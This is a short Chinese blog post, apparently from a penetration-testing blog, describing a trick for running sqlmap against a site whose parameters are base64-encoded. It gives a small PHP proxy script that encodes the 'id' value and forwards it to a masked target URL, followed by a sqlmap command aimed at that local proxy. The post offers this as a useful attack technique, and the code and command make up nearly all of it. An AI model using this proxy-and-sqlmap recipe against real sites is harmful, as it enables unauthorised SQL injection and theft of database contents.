其实http://www.cnblogs.com/xishaonian/p/6276799.html这个就是一个案例了。
但是不得不重写一篇文章来记载。因为这是一个姿势。很好的姿势。
保存为xishaonian.php
<?php $id = base64_encode("id=".$_GET['id']); echo file_get_contents("http://www.xxxx.com/project_detail.php?{$id}"); ?>
sqlmap,py -u "http://127.0.0.1/xishaonian.php?id=12" -v3